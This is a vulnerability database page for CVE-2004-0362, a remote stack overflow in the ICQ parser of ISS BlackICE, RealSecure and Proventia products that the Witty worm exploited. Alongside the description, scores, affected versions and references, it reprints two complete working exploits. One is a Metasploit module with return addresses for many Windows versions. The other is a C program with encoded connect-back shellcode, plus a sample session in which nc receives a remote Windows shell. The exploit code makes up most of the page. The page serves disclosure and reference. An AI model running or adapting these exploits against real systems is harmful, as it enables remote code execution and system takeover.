CVE-2004-0362 : Detail

CVE-2004-0362

75.73%V4
Network
2004-03-23
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple stack-based buffer overflows in the ICQ parsing routines of the ISS Protocol Analysis Module (PAM) component, as used in various RealSecure, Proventia, and BlackICE products, allow remote attackers to execute arbitrary code via a SRV_MULTI response containing a SRV_USER_ONLINE response packet and a SRV_META_USER response packet with long (1) nickname, (2) firstname, (3) lastname, or (4) email address fields, as exploited by the Witty worm.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16464

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: blackice_pam_icq.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, 'Name' => 'ISS PAM.dll ICQ Parser Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times. }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, 'Version' => '$Revision: 10394 $', 'References' => [ ['CVE', '2004-0362'], ['OSVDB', '4355'], ['URL', 'http://www.eeye.com/html/Research/Advisories/AD20040318.html'], ['URL', 'http://xforce.iss.net/xforce/alerts/id/166'], ], 'Payload' => { 'Space' => 504 -31 -4, 'BadChars' => "\x00", 'MinNops' => 0, 'MaxNops' => 0, 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ [ 'Bruteforce', { } ], [ 'Bruteforce iis-pam1.dll', { 'Targets' => 3 .. 4 } ], [ 'Bruteforce NT 4.0', { 'Targets' => 5 .. 15 } ], [ 'iis-pam1.dll 3.6.06', { 'Ret' => 0x5e0a47ef } ], [ 'iis-pam1.dll 3.6.11', { 'Ret' => 0x5e0da1db } ], [ 'WinNT SP3/SP4/SP5', { 'Ret' => 0x777e79ab } ], [ 'WinNT SP4/SP5', { 'Ret' => 0x7733b8db } ], [ 'WinNT SP5/SP6 - advapi32', { 'Ret' => 0x77dcd1cb } ], [ 'WinNT SP3/SP5/SP6 - shell32', { 'Ret' => 0x77cec080 } ], [ 'WinNT SP5/SP6 - mswsock', { 'Ret' => 0x7767ebca } ], [ 'WinXP SP0/SP1 - shell32', { 'Ret' => 0x776606af } ], [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76b305a7 } ], [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76e61a21 } ], [ 'WinXP SP0/SP1 - ws2_32', { 'Ret' => 0x71ab7bfb } ], [ 'WinXP SP0/SP1 - mswsock', { 'Ret' => 0x71a5403d } ], [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ], [ 'Win2000 SP0 - SP4', { 'Ret' => 0x750231e2 } ], [ 'Win2000 SP2/SP3 - samlib', { 'Ret' => 0x75159da3 } ], [ 'Win2000 SP0/SP1 - activeds', { 'Ret' => 0x77ed0beb } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ], [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], [ 'WinXP SP0 - SP1', { 'Ret' => 0x71aa3a4b } ], [ 'Win2003 SP0', { 'Ret' => 0x71bf3cc9 } ], ], 'DisclosureDate' => 'Mar 18 2004', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(1) ], self.class) end def exploit datastore['RPORT'] = rand(65536) if rport == 1 targs = [ target ] if target.name =~ /^Brute/ if target['Targets'] targs = [] target['Targets'].each { |idx| targs << targets[idx] } else targs = targets.dup targs.delete_at(0) targs.delete_at(0) targs.delete_at(0) end end targs.each { |targ| print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...") shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length) email = rand_text_english(19) + [targ.ret].pack('V') + shellcode # Hopefully this structure is correct -- ported from msf 2. Blame me # (skape) if it doesn't work! packet = # SRV_MULTI [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + # SRV_USER_ONLINE [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') + [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') + # SRV_META_USER [5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') + "\x00\x00\x0a" + # subcommand / success "\x00\x00" + # nick length / nick "\x00\x00" + # first length / first "\x00\x00" + # last length / last [email.length].pack('v') + email + "\x00\x00\x00\x00\x00\x00\x00" print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)") connect_udp(true, { 'CPORT' => 4000 }) udp_sock.put(packet) disconnect_udp print_status("Sleeping (giving exception handler time to recover)") select(nil,nil,nil,5) } end end
Exploit Database EDB-ID : 168

Publication date : 2004-03-27 23h00 +00:00
Author : Sam
EDB Verified : Yes

/* 557iss_pam_exp - RealSecure / Blackice ICQ iss_pam1.dll remote overflow exploit * * Copyright (c) SST 2004 All rights reserved. * * Public version * * code by Sam (Sam`@efnet) and 2004/03/26 * <chen_xiaobo@venustech.com.cn> * <Sam@0x557.org> * * * * Compile: gcc -o 557iss_pam_exp 557iss_pam_exp.c * * how works? * [root@core exp]# ./557iss_pam_exp 192.168.10.2 192.168.10.169 5570 * 557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit * - Sam * * # attack remote host: 192.168.10.2. * # listen host: 192.168.10.169. * # listen port: 5570. * # send overflow udp datas * # 1199 bytes send * # done. * # make sure we are in, dude :) * * * [root@core root]# nc -vv -l -p 5570 * listening on [any] 5570 ... * 192.168.10.2: inverse host lookup failed: Host name lookup failure * connect to [192.168.10.169] from (UNKNOWN) [192.168.10.2] 3604 * Microsoft Windows XP [Version 5.1.2600] * (C) Copyright 1985-2001 Microsoft Corp. * * C:\Program Files\ISS\BlackICE> * C:\Program Files\ISS\BlackICE> * C:\Program Files\ISS\BlackICE> * * * some thanks/greets to: * eeye (they find this bug :D), airsupply, kkqq, icbm, my gf :I * and everyone else who's KNOW SST ;P * http://0x557.org */ #include <stdio.h> #include <unistd.h> #include <stdarg.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <assert.h> #include <fcntl.h> #include <sys/time.h> char icq_header [] = "\x05\x00" // ICQ VERSION "\x00" // unused "\x00\x00\x00\x00" // Session ID "\x12\x02" // reply to SRV_MULTI_PACKET "\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2 "\x00\x00\x00\x00" // UIN Your (the client's) UIN "\x00\x00\x00\x00" // CHECKCODE "\x02" // SRV_MULTI Parameter Block 1 of 2 // Number of individual responses "\x2c\x00" // Size of sub-response (44 bytes, little-endian) "\x05\x00" // ICQ VERSION "\x00" // unused "\x00\x00\x00\x00" // Session ID "\x6e\x00" // reply to SRV_USER_OLINE "\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2 "\x00\x00\x00\x00" // UIN Your (the client's) UIN "\x00\x00\x00\x00" // CHECKCODE "\x00\x00\x00\x00" // UIN of user changing status "\x01\x00\x00\x00" // Other user's IP address (1.0.0.0) "\x00\x00\x00\x00" // Other user's direct-connect port (default) "\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\x00\x00" "\x41\x02" // SRV_MULTI Parameter Block 2 of 2 // Size of sub-response (577 bytes) "\x05\x00" // ICQ VERSION "\x00" // unused "\x00\x00\x00\x00" // Session ID "\xde\x03" // reply to SRV_META_USER "\x00\x00\x00\x00" // SEQ_NUM1 and SEQ_NUM2 "\x00\x00\x00\x00" // UIN Your (the client's) UIN "\x00\x00\x00\x00" // CHECKCODE "\x00\x00\x00\x01" "\x00\x00\x01\x00" "\x00\x01\x00\x00" "\x1e\x02"; struct sockaddr_in addr, local; char *bindHost = NULL; unsigned short port; /* * hsj's connect back shellcodes */ char shellcode [] = /* decoder */ "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" "\x93\x40\xe2\xfa" /* code */ "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1" "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2" "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93" "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7" "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0" "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8" "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93" "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93" "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0" "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87" "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60" "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5" "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90" "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22" "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18" "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92" "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3" "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93" "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9" "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18" "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50"; /* udpconnect: * */ int udpConnect (char *hostName) { struct hostent* host = NULL; int sock = -1; host = gethostbyname (hostName); if (NULL == host) { perror ("gethostbyname() failed"); return -1; } sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP); if ( -1 == sock) { perror ("socket() failed\n"); return -1; } memset (&addr, 0x00, sizeof (addr)); addr.sin_addr = *(struct in_addr *) host->h_addr; addr.sin_family = AF_INET; addr.sin_port = htons(random()); memset (&local, 0x00, sizeof (local)); local.sin_family = AF_INET; local.sin_addr.s_addr = htonl (INADDR_ANY); local.sin_port = htons(4000); if (bind (sock, (struct sockaddr *) &local, sizeof(local)) != 0) { perror ("bind error\n"); return -1; } return sock; } /* resolve listen host */ unsigned int resolve (char *name) { struct hostent *he; unsigned int ip; if ((ip = inet_addr (name)) == (-1)) { if ((he = gethostbyname (name)) ==0 ) return 0; memcpy (&ip, he->h_addr, 4); } return ip; } /* * send datas */ int udp_send (int sock, char *buffer, int buff_len) { int ret; ret = sendto (sock, buffer, buff_len, 0, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)); if (ret <= NULL) { perror ("sendto failed\n"); return -1; } fprintf (stderr, "# %d bytes send\n", ret); return ret; } /* * send evil datas, fuck ISS's blackice. */ int do_sendudp_data (char *hostName) { unsigned int cb; int sock; char expbuf[1200]; memset (expbuf, 0x90, sizeof (expbuf)); memcpy (expbuf, icq_header, sizeof (icq_header) - 1); /* * jmp esp opcodes from iss_pam1.dll */ *(unsigned int *)&expbuf[637] = 0x5e077663; if (!(cb = resolve (bindHost))) { printf ("Unknown listen host\n"); return -1; } port = htons (port); port ^= 0x9393; cb ^= 0x93939393; *(unsigned short *)&shellcode[330] = port; *(unsigned int *)&shellcode[335] = cb; memcpy (expbuf + 637 + 4, shellcode, strlen (shellcode)); if ((sock = udpConnect (hostName)) < 0) { printf ("connect failed\n"); exit (-1); } fprintf (stderr, "# send overflow udp datas\n"); udp_send (sock, expbuf, sizeof (expbuf) - 1); close (sock); return 0; } /* * just main . dude. */ int main (int argc, char **argv) { int new; char *target = NULL; fprintf (stderr, "557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit\n - Sam\n\n"); if (argc != 4) { fprintf (stderr, "%s <hostname> <listenhost> <listen port>\n", argv[0]); fprintf (stderr, "listenhost, port: connect back host and port\n\n"); return -1; } target = argv[1]; bindHost = argv[2]; port = atoi (argv[3]); fprintf (stderr, "# attack remote host: %s. \n", target); fprintf (stderr, "# listen host: %s. \n", bindHost); fprintf (stderr, "# listen port: %d. \n", port); do_sendudp_data (target); fprintf (stderr, "# done.\n"); fprintf (stderr, "# make sure we are in, dude :)\n\n"); return 0; } // milw0rm.com [2004-03-28]

Products Mentioned

Configuraton 0

Iss>>Blackice_agent_server >> Version 3.6ebz

Iss>>Blackice_agent_server >> Version 3.6eca

Iss>>Blackice_agent_server >> Version 3.6ecb

Iss>>Blackice_agent_server >> Version 3.6ecc

Iss>>Blackice_agent_server >> Version 3.6ecd

Iss>>Blackice_agent_server >> Version 3.6ece

Iss>>Blackice_agent_server >> Version 3.6ecf

Iss>>Blackice_pc_protection >> Version 3.6cbz

Iss>>Blackice_pc_protection >> Version 3.6cca

Iss>>Blackice_pc_protection >> Version 3.6ccb

Iss>>Blackice_pc_protection >> Version 3.6ccc

Iss>>Blackice_pc_protection >> Version 3.6ccd

Iss>>Blackice_pc_protection >> Version 3.6cce

Iss>>Blackice_pc_protection >> Version 3.6ccf

Iss>>Blackice_server_protection >> Version 3.6cbz

Iss>>Blackice_server_protection >> Version 3.6cca

Iss>>Blackice_server_protection >> Version 3.6ccb

Iss>>Blackice_server_protection >> Version 3.6ccc

Iss>>Blackice_server_protection >> Version 3.6ccd

Iss>>Blackice_server_protection >> Version 3.6cce

Iss>>Blackice_server_protection >> Version 3.6ccf

Iss>>Realsecure_desktop >> Version 3.6ebz

Iss>>Realsecure_desktop >> Version 3.6eca

Iss>>Realsecure_desktop >> Version 3.6ecb

Iss>>Realsecure_desktop >> Version 3.6ecd

Iss>>Realsecure_desktop >> Version 3.6ece

Iss>>Realsecure_desktop >> Version 3.6ecf

Iss>>Realsecure_desktop >> Version 7.0eba

Iss>>Realsecure_desktop >> Version 7.0ebf

Iss>>Realsecure_desktop >> Version 7.0ebg

Iss>>Realsecure_desktop >> Version 7.0ebh

Iss>>Realsecure_desktop >> Version 7.0ebj

Iss>>Realsecure_desktop >> Version 7.0ebk

Iss>>Realsecure_desktop >> Version 7.0ebl

Iss>>Realsecure_guard >> Version 3.6ebz

Iss>>Realsecure_guard >> Version 3.6eca

Iss>>Realsecure_guard >> Version 3.6ecb

Iss>>Realsecure_guard >> Version 3.6ecc

Iss>>Realsecure_guard >> Version 3.6ecd

Iss>>Realsecure_guard >> Version 3.6ece

Iss>>Realsecure_guard >> Version 3.6ecf

Iss>>Realsecure_network_sensor >> Version 7.0

Iss>>Realsecure_network_sensor >> Version 7.0

    Iss>>Realsecure_network_sensor >> Version 7.0

      Iss>>Realsecure_network_sensor >> Version 7.0

        Iss>>Realsecure_network_sensor >> Version 7.0

          Iss>>Realsecure_sentry >> Version 3.6ebz

          Iss>>Realsecure_sentry >> Version 3.6eca

          Iss>>Realsecure_sentry >> Version 3.6ecb

          Iss>>Realsecure_sentry >> Version 3.6ecc

          Iss>>Realsecure_sentry >> Version 3.6ecd

          Iss>>Realsecure_sentry >> Version 3.6ece

          Iss>>Realsecure_sentry >> Version 3.6ecf

          Iss>>Realsecure_server_sensor >> Version 6.0

            Iss>>Realsecure_server_sensor >> Version 6.0.1

              Iss>>Realsecure_server_sensor >> Version 6.0.1_win_sr1.1

                Iss>>Realsecure_server_sensor >> Version 6.5

                  Iss>>Realsecure_server_sensor >> Version 6.5

                    Iss>>Realsecure_server_sensor >> Version 6.5

                      Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.1

                        Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.4

                          Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.5

                            Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.6

                              Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.7

                                Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.8

                                  Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.9

                                    Iss>>Realsecure_server_sensor >> Version 6.5_win_sr3.10

                                      Iss>>Realsecure_server_sensor >> Version 7.0

                                        Iss>>Realsecure_server_sensor >> Version 7.0

                                          Iss>>Realsecure_server_sensor >> Version 7.0

                                            Iss>>Realsecure_server_sensor >> Version 7.0

                                              Iss>>Realsecure_server_sensor >> Version 7.0

                                                Iss>>Realsecure_server_sensor >> Version 7.0

                                                  Iss>>Realsecure_server_sensor >> Version 7.0

                                                    Iss>>Realsecure_server_sensor >> Version 7.0

                                                      Iss>>Realsecure_server_sensor >> Version 7.0

                                                        Iss>>Realsecure_server_sensor >> Version 7.0

                                                          Iss>>Realsecure_server_sensor >> Version 7.0

                                                            Configuraton 0

                                                            Iss>>Proventia_a_series_xpu >> Version 20.11

                                                            Iss>>Proventia_a_series_xpu >> Version 22.1

                                                            Iss>>Proventia_a_series_xpu >> Version 22.2

                                                            Iss>>Proventia_a_series_xpu >> Version 22.3

                                                            Iss>>Proventia_a_series_xpu >> Version 22.4

                                                            Iss>>Proventia_a_series_xpu >> Version 22.5

                                                            Iss>>Proventia_a_series_xpu >> Version 22.6

                                                            Iss>>Proventia_a_series_xpu >> Version 22.7

                                                            Iss>>Proventia_a_series_xpu >> Version 22.8

                                                            Iss>>Proventia_a_series_xpu >> Version 22.9

                                                            Iss>>Proventia_a_series_xpu >> Version 22.10

                                                            Iss>>Proventia_g_series_xpu >> Version 22.1

                                                            Iss>>Proventia_g_series_xpu >> Version 22.2

                                                            Iss>>Proventia_g_series_xpu >> Version 22.3

                                                            Iss>>Proventia_g_series_xpu >> Version 22.4

                                                            Iss>>Proventia_g_series_xpu >> Version 22.5

                                                            Iss>>Proventia_g_series_xpu >> Version 22.6

                                                            Iss>>Proventia_g_series_xpu >> Version 22.7

                                                            Iss>>Proventia_g_series_xpu >> Version 22.8

                                                            Iss>>Proventia_g_series_xpu >> Version 22.9

                                                            Iss>>Proventia_g_series_xpu >> Version 22.10

                                                            Iss>>Proventia_g_series_xpu >> Version 22.11

                                                            Iss>>Proventia_m_series_xpu >> Version 1.1

                                                            Iss>>Proventia_m_series_xpu >> Version 1.2

                                                            Iss>>Proventia_m_series_xpu >> Version 1.3

                                                            Iss>>Proventia_m_series_xpu >> Version 1.4

                                                            Iss>>Proventia_m_series_xpu >> Version 1.5

                                                            Iss>>Proventia_m_series_xpu >> Version 1.6

                                                            Iss>>Proventia_m_series_xpu >> Version 1.7

                                                            Iss>>Proventia_m_series_xpu >> Version 1.8

                                                            Iss>>Proventia_m_series_xpu >> Version 1.9

                                                            References

                                                            http://xforce.iss.net/xforce/alerts/id/166
                                                            Tags : third-party-advisory, x_refsource_ISS
                                                            http://www.securityfocus.com/bid/9913
                                                            Tags : vdb-entry, x_refsource_BID
                                                            http://secunia.com/advisories/11073
                                                            Tags : third-party-advisory, x_refsource_SECUNIA
                                                            http://www.ciac.org/ciac/bulletins/o-104.shtml
                                                            Tags : third-party-advisory, government-resource, x_refsource_CIAC
                                                            http://www.eeye.com/html/Research/Advisories/AD20040318.html
                                                            Tags : third-party-advisory, x_refsource_EEYE
                                                            http://www.osvdb.org/4355
                                                            Tags : vdb-entry, x_refsource_OSVDB
                                                            http://www.kb.cert.org/vuls/id/947254
                                                            Tags : third-party-advisory, x_refsource_CERT-VN
                                                            http://marc.info/?l=bugtraq&m=107965651712378&w=2
                                                            Tags : mailing-list, x_refsource_BUGTRAQ